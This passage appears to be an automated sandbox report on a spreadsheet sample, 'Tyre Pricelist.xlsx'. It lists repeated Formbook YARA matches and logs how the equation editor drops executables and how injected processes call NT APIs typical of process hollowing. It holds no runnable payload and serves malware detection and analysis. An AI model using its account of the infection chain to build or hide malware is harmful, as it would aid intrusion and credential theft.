          Source: Yara match File source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
          Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\choice.exe Memory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\choice.exe Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Memory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe Code function: 4_2_002F00AD NtOpenSection,NtMapViewOfSection,
          Source: C:\Users\Public\vbc.exe Code function: 4_2_002F1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtSetContextThread,NtResumeThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00419D50 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00419E00 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00419E80 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00419F30 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00419D4B NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00419DFE NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00419DA4 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00419E7A NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00419F2B NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_02530048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_02530078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_025300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_02530060 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_025310D0 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_02531148 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0253010C NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_025301D4 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_025307AC NtCreateMutant,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FA50 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FA20 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FAB8 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FB50 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252F8CC NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_02531930 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252F938 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FE24 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FF34 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FFFC NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_02530C40 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FC48 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FC30 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0252FD5C NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_02531D80 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_008B9862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_008B9DAE NtResumeThread,NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C500C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C507AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C510D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C50048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C50060 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C50078 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C501D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C51148 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C5010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C51930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C50C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C51D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00C4FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099E00 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099E80 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099D4B NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099DA4 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099DFE NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099E7A NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 11_2_00099F2B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exe, File deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: Tyre Pricelist.xlsx, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: String function: 00CA3F92 appears 108 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: String function: 00CA373B appears 238 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: String function: 00C5E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: String function: 00CCF970 appears 81 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: String function: 00C5DF5C appears 118 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: String function: 0253E2A8 appears 38 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: String function: 0253DF5C appears 119 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: String function: 025AF970 appears 84 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: String function: 0258373B appears 244 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: String function: 02583F92 appears 132 times
          Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: svchost[1].exe.2.dr, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
